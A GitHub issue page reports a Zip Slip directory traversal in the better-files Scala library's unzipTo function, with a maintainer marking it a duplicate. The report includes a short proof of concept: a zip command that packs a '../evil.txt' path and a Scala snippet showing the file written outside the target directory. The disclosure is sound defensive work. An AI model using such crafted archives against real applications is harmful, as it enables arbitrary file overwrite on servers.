Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Directory Traversal Issue in File.unzipTo #624

Closed
sandumjacob opened this issue Jul 25, 2023 · 1 comment
Closed

Directory Traversal Issue in File.unzipTo #624

sandumjacob opened this issue Jul 25, 2023 · 1 comment

Comments

@sandumjacob
Copy link

Issue Description

There is a directory traversal issue in the unzipTo function in File.scala. The issue allows a zip file containing path traversal filenames to write outside the target directory. This can result in applications using better-files to be vulnerable to arbitrary file write/overwrite. This sort of vulnerability can result in tampering exploits to full system takeover of the application server.

ZipSlip Vulnerability

Proof of Concept

To create bad.zip, run the following command with good.txt in the current directory and evil.txt in the directory above the current directory.

zip bad.zip good.txt ../evil.txt

poc.scala

import better.files._
import File._
val f1 = File("bad.zip")
val tempdir = File.temporaryDirectory()
f1.unzipTo(tempdir.get())

Observe that good.txt is written to the tempdir and evil.txt is written to a directory above the tempdir.

/tmp/12345/good.txt
/tmp/evil.txt
@pathikrit
Copy link
Owner

Duplicate of #256

@pathikrit pathikrit marked this as a duplicate of #256 Jul 28, 2023
@sandumjacob sandumjacob mentioned this issue Sep 26, 2023
Merged
@arteme arteme mentioned this issue Mar 8, 2024
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@pathikrit @sandumjacob